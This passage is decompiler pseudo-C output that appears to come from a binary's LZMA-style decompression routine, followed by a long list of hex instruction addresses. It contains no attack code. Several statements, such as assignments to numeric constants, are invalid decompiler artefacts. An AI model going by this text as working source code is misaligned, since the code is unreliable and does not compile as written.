											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406dc3
0x00406dc3
0x00406dc7
0x00406df0
0x00406dfa
0x00406dc9
0x00406dd2
0x00406ddf
0x00406de2
0x00407126
0x00407126
0x00407129
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x00000000
0x00000000
0x00407177
0x0040717b
0x0040732a
0x00407340
0x00407348
0x0040734f
0x00407351
0x00407358
0x0040735c
0x0040735c
0x00407187
0x0040718e
0x00407196
0x00407199
0x0040719c
0x0040719c
0x004071a2
0x004071a2
0x0040693e
0x0040693e
0x0040693e
0x00406947
0x00000000
0x00000000
0x0040694d
0x00000000
0x00406958
0x00000000
0x00000000
0x00406961
0x00406964
0x00406967
0x0040696b
0x00000000
0x00000000
0x00406971
0x00406974
0x00406976
0x00406977
0x0040697a
0x0040697c
0x0040697d
0x0040697f
0x00406982
0x00406987
0x0040698c
0x00406995
0x004069a8
0x004069ab
0x004069b7
0x004069df
0x004069e1
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004069e3
0x004069e3
0x004069e6
0x004069e7
0x004069e7
0x00000000
0x004069e3
0x004069bd
0x004069c2
0x004069c2
0x004069cb
0x004069d3
0x004069d6
0x00000000
0x004069dc
0x004069dc
0x00000000
0x004069dc
0x00000000
0x004069f9
0x004069f9
0x004069fd
0x004072a9
0x00000000
0x004072a9
0x00406a06
0x00406a16
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1c
0x00406a1f
0x00406a23
0x00000000
0x00000000
0x00406a25
0x00406a2b
0x00406a55
0x00406a5b
0x00406a62
0x00000000
0x00406a62
0x00406a31
0x00406a34
0x00406a39
0x00406a39
0x00406a44
0x00406a4c
0x00406a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a94
0x00406a9a
0x00406a9d
0x00406aaa
0x00406ab2
0x00407126
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a6d
0x004072b8
0x00000000
0x004072b8
0x00406a79
0x00406a84
0x00406a84
0x00406a84
0x00406a87
0x00406a8a
0x00406a8d
0x00406a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406aba
0x00406abc
0x00406abf
0x00406b30
0x00406b33
0x00406b36
0x00406b3d
0x00406b47
0x00407126
0x00407126
0x00000000
0x00407126
0x00407126
0x00406ac1
0x00406ac5
0x00406ac8
0x00406aca
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad7
0x00406adc
0x00406adf
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af7
0x00406afb
0x00406b03
0x00406b03
0x00406b03
0x00406afd
0x00406afd
0x00406afd
0x00406af2
0x00406af2
0x00406af2
0x00406b07
0x00406b0a
0x00406b28
0x00406b2a
0x00000000
0x00406b0c
0x00406b0c
0x00406b0f
0x00406b12
0x00406b15
0x00406b17
0x00406b17
0x00406b17
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b20
0x00406b23
0x00000000
0x00406b23
0x00000000
0x00406d59
0x00406d5d
0x00406d7b
0x00406d7e
0x00406d85
0x00406d88
0x00406d8b
0x00406d8e
0x00406d91
0x00406d94
0x00406d96
0x00406d9d
0x00406d9e
0x00406da0
0x00406da3
0x00406da6
0x00406da9
0x00406da9
0x00406dae
0x00000000
0x00406dae
0x00406d5f
0x00406d62
0x00406d65
0x00406d6f
0x00407126
0x00407126
0x00000000
0x00407126
0x00000000
0x00000000
0x00000000
0x00406e06
0x00406e0a
0x00000000
0x00000000
0x00406e10
0x00406e14
0x00000000
0x00000000
0x00406e1a
0x00406e1c
0x00406e20
0x00406e20
0x00406e23
0x00406e27
0x00000000
0x00000000
0x00406e77
0x00406e7b
0x00406e82
0x00406e85
0x00406e88
0x00406e92
0x00407126
0x00407126
0x00000000
0x00407126
0x00407126
0x00406e7d
0x00000000
0x00000000
0x00406e9e
0x00406ea2
0x00406ea9
0x00406eac
0x00406eaf
0x00406ea4
0x00406ea4
0x00406ea4
0x00406eb2
0x00406eb5
0x00406eb8
0x00406eb8
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ecb
0x00406ed0
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f62
0x00407300
0x00000000
0x00407300
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f75
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f7d
0x00406f80
0x00406f83
0x00000000
0x00000000
0x00406b53
0x00406b53
0x00406b57
0x004072c4
0x00000000
0x004072c4
0x00406b5d
0x00406b60
0x00406b63
0x00406b67
0x00406b6a
0x00406b70
0x00406b72
0x00406b72
0x00406b72
0x00406b75
0x00406b78
0x00406b78
0x00406b7b
0x00406b7e
0x00000000
0x00000000
0x00406b84
0x00406b8a
0x00000000
0x00000000
0x00406b90
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00406ba0
0x00406ba1
0x00406ba4
0x00406ba6
0x00406bac
0x00406baf
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbb
0x00406bbe
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406bea
0x00406bee
0x00406bf0
0x00406bf4
0x00406bc0
0x00406bc0
0x00406bc4
0x00406bcc
0x00406bd1
0x00406bd3
0x00406bd5
0x00406bd5
0x00406bf7
0x00406bfe
0x00406c01
0x00000000
0x00406c07
0x00000000
0x00406c07
0x00000000
0x00406c0c
0x00406c0c
0x00406c10
0x004072d0
0x00000000
0x004072d0
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c23
0x00406c29
0x00406c2b
0x00406c2b
0x00406c2b
0x00406c2e
0x00406c31
0x00406c31
0x00406c31
0x00406c37
0x00000000
0x00000000
0x00406c39
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c48
0x00406c4b
0x00406c4e
0x00406c51
0x00406c54
0x00406c57
0x00406c6f
0x00406c72
0x00406c75
0x00406c78
0x00406c78
0x00406c7b
0x00406c7f
0x00406c81
0x00406c59
0x00406c59
0x00406c61
0x00406c66
0x00406c68
0x00406c6a
0x00406c6a
0x00406c84
0x00406c8b
0x00406c8e
0x00000000
0x00406c90
0x00000000
0x00406c90
0x00406c8e
0x00406c95
0x00406c95
0x00406c95
0x00406c95
0x00000000
0x00000000
0x00406cd0
0x00406cd0
0x00406cd4
0x004072dc
0x00000000
0x004072dc
0x00406cda
0x00406cdd
0x00406ce0
0x00406ce4
0x00406ce7
0x00406ced
0x00406cef
0x00406cef
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf5
0x00406cfb
0x00406c99
0x00406c99
0x00406c9c
0x00000000
0x00406c9c
0x00406cfd
0x00406cfd
0x00406d00
0x00406d03
0x00406d06
0x00406d09
0x00406d0c
0x00406d0f
0x00406d12
0x00406d15
0x00406d18
0x00406d1b
0x00406d33
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d43
0x00406d45
0x00406d1d
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2c
0x00406d2e
0x00406d2e
0x00406d48
0x00406d4f
0x00406d52
0x00000000
0x00406d54
0x00000000
0x00406d54
0x00000000
0x00406fe1
0x00406fe1
0x00406fe5
0x0040730c
0x00000000
0x0040730c
0x00406feb
0x00406fee
0x00406ff1
0x00406ff5
0x00406ff8
0x00406ffe
0x00407000
0x00407000
0x00407000
0x00407003
0x00000000
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00407126
0x00407126
0x00000000
0x00407126
0x00000000
0x004070f0
0x004070f4
0x00407116
0x00407119
0x00407123
0x00407126
0x00407126
0x00000000
0x00407126
0x00407126
0x004070f6
0x004070f9
0x004070fd
0x00407100
0x00407100
0x00407103
0x00000000
0x00000000
0x004071ad
0x004071b1
0x004071cf
0x004071cf
0x004071cf
0x004071d6
0x004071dd
0x004071e4
0x004071e4
0x00000000
0x004071e4
0x004071b3
0x004071b6
0x004071b9
0x004071bc
0x004071c3
0x00407107
0x00407107
0x0040710a
0x00000000
0x00000000
0x0040729e
0x004072a1
0x004071a2
0x00000000
0x00000000
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00000000
0x00000000
0x00406eef
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406ef9
0x00406efa
0x00406efd
